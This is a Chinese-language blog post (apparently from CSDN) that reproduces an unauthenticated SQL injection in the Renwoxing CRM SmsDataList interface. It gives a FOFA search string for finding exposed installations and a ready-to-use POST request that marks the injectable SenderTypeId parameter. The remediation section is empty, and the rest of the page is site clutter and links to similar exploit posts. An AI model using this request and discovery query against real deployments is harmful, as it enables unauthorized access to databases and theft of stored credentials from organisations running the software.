漏洞复现 || 某我行CRM系统SQL注入

最新推荐文章于 2024-07-12 07:13:33 发布
最新推荐文章于 2024-07-12 07:13:33 发布
阅读量274 收藏
点赞数
分类专栏: 网络安全 web安全 渗透测试 漏洞复现 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/132389761
版权

漏洞描述

某任我行 CRM SmsDataList 接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,SenderTypeId参数存在注入,最终可能导致服务器失陷。
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa:"任我行 CRM"

漏洞复现


POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 170

Keywords=&StartSendDate=2023-08-10&EndSendDate=2023-08-18&SenderTypeId=0000000000*

在这里插入图片描述

修复方案

丢了少年失了心1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
【1day】复现任我行协同CRM存在SQL注入漏洞
记录并分享学习安全的知识点..
08-14 621
任我行CRMCRM(客户关系管理)、OA(自动化办公)、OM(目标管理)、KM(知识管理)、HR(人力资源)一体化的企业管理软件。通过建立组织运营管理铁三角(目标行动-企业文化-知识复制),一切围绕以客户为中心的全方位、透明化业务管理(市场-销售-生产-服务),打造企业组织高效协同的运营管理平台。任我行协同CRM存在SQL注入漏洞,远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
任我行CRM系统SmsDataList接口存在SQL注入漏洞 附POC软件
nnn2188185的博客
01-02 411
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发任我行CRM系统是客户关系管理,集OA自动化办公、OM目标管理、KM知识管理、HR人力资源为一体集成的企业管理软件。
任我行-CRM SQL注入
Bnessy
10-29 130
【代码】任我行-CRM SQL注入
漏洞复现-任我行CRM系统SmsDataList接口SQL注入漏洞(附漏洞检测脚本)
jjjj1029056414的博客
01-04 517
漏洞复现-任我行CRM系统SmsDataList接口SQL注入漏洞,附带自己写的poc脚本
帮管客CRM 某些接口存在文件上传漏洞-1day未公开漏洞
weixin_43167326的博客
02-01 430
帮管客CRM是专注于为中小型企业提供协同管理软件、办公管理解决方案和云服务,致力于打造优质低价的企业办公管理软件。存在文件上传漏洞,攻击者可能会利用这个漏洞上传恶意文件,进而控制服务器或窃取敏感数据。
禅道研发项⽬管理系统sql注入漏洞.zip
01-21
管理系统是一种通过计算机技术实现的用于组织、监控和控制各种活动的软件系统。这些系统通常被设计用来提高效率、减少错误、加强安全性,同时提供数据和信息支持。以下是一些常见类型的管理系统: 学校管理系统: ...
RUOYI-YD CRM模块sql文件
05-17
《若依框架下的CRM模块SQL文件详解》 在IT领域,尤其在企业信息化管理中,CRM(Customer Relationship Management,客户关系管理)系统扮演着至关重要的角色。若依框架,作为一个广受欢迎的开源Java Web框架,以其...
客户管理系统项目源码(CRM)SQL Server 2005.zip
06-12
本项目源码——"客户管理系统项目源码(CRM)SQL Server 2005.zip" 提供了一套基于SQL Server 2005的CRM系统实现,旨在帮助开发者理解CRM系统的基本架构与功能,并可作为开发参考。 首先,我们来看项目所依赖的关键...
CRM管理系统 C#+ winform +sql server
06-12
CRM客户管理系统 框架 vs2019 + winform + sql server 注意sql server类和access数据库可以使用vs自带的数据库启动,不需要安装庞大的sql安装包。 管理员用户密码 客户用户密码 模块介绍 管理员 登陆模块 注册...
SSM框架-CRM系统-含SQL文件
07-09
这个“SSM框架-CRM系统-含SQL文件”项目提供了一个基于SSM实现的客户关系管理系统CRM),它包含了完整的SQL数据文件,能够帮助开发者快速搭建和运行CRM应用。 1. **Spring框架**:Spring是Java企业级应用的核心...
任我行CRM系统存在 SQL注入漏洞[2023-HW]
holyxp的博客
08-16 1019
任我行CRM(Customer Relationship Management)是一款专业的企业级CRM软件,旨在帮助企业有效管理客户关系、提升销售效率和提供个性化的客户服务。任我行 CRM SmsDataList 接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
Doliber ERP & CRM漏洞复现报告
weixin_62570809的博客
11-02 1264
Doliber ERP & CRM漏洞复现
SQL性能优化策略
modelsetget的博客
07-08 488
你不得不知的SQL调优策略笔记
F4搜索帮助和按条件写sql
m0_60109224的博客
07-08 272
2.按条件读取刚刚写的sql数据,if sy-subrc 中可以继续读。3.搜索帮助用函数和sql实现。4.根据屏幕输入数据筛选实现。
如何解决 PostgreSQL 中由于索引不当导致的性能下降问题?
最新发布
技术笔记
07-12 449
比如说,有一个订单表,其中“订单日期”这个列经常被用于按时间范围查询订单,但却没有为其创建索引,这就会导致数据库在查询时需要遍历整个表,极大地降低了查询速度。命令,我们可以查看查询的执行计划。再举一个例子,如果我们发现某个表上存在多个类似的索引,比如“idx_age_1”和“idx_age_2”,并且它们的定义几乎相同,这时候就可以考虑删除其中一个冗余的索引,以减少维护成本和提高性能。然而,就像任何复杂的系统一样,它也可能会遇到性能方面的挑战,其中由于索引不当导致的性能下降问题是比较常见且令人头疼的。
[高频 SQL 50 题(基础版)]第一千七百五十七题,可回收且低脂产品
weixin_45201305的博客
07-10 258
low_fats 是枚举类型,取值为以下两种 ('Y', 'N'),其中 'Y' 表示该产品是低脂产品,'N' 表示不是低脂产品。recyclable 是枚举类型,取值为以下两种 ('Y', 'N'),其中 'Y' 表示该产品可回收,而 'N' 表示不可回收。没什么难度,作为基础题五十题的第一题练手,现在也开始陆续写一些SQL,作为记录,和leetcode一起,大家都加油。编写解决方案找出既是低脂又是可回收的产品编号。是该表的主键(具有唯一值的列)。
SQL面试题-留存率计算
xiao4816的博客
07-07 326
计算的是整段时间范围内,每一天为基准的所有的留存1、2、7天的用户数。计算的是用户首次登陆时间为基准时间,计算该基准时间之后的n日留存率。方法一的优势是可以一次性计算出,每天的不同时间范围的留存率。缺点:如果要计算n天留存需要增加代码量。但是不是很直观,并且计算量比较大。优点:代码直观好理解。
SQL Server设置端口:跨平台指南
招风的黑耳CSDN
07-09 586
在使用SQL Server时,设置或修改其监听的端口是确保数据库服务安全访问和高效管理的重要步骤。由于SQL Server可以部署在多种操作系统上,包括Windows、Linux和Docker容器等,因此设置端口的步骤和方法也会因平台而异。本文将为您提供一个跨平台的指南,帮助您在不同环境下设置SQL Server的端口。
数据如何查询
qq_46863837的博客
07-08 1221
只有学会DQL,才是真正的进入数据库的世界
零起飞CRM管理系统(07FLY-CRM)-代码审计(任意文件删除+RCE+任意文件上传+SQL注入)1
08-03
零起飞CRM管理系统(07FLY-CRM)是一项针对企业客户关系管理的软件解决方案,其代码审计揭示了一系列安全漏洞,包括任意文件删除(Arbitrary File Deletion)、远程代码执行(Remote Code Execution, RCE)、任意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值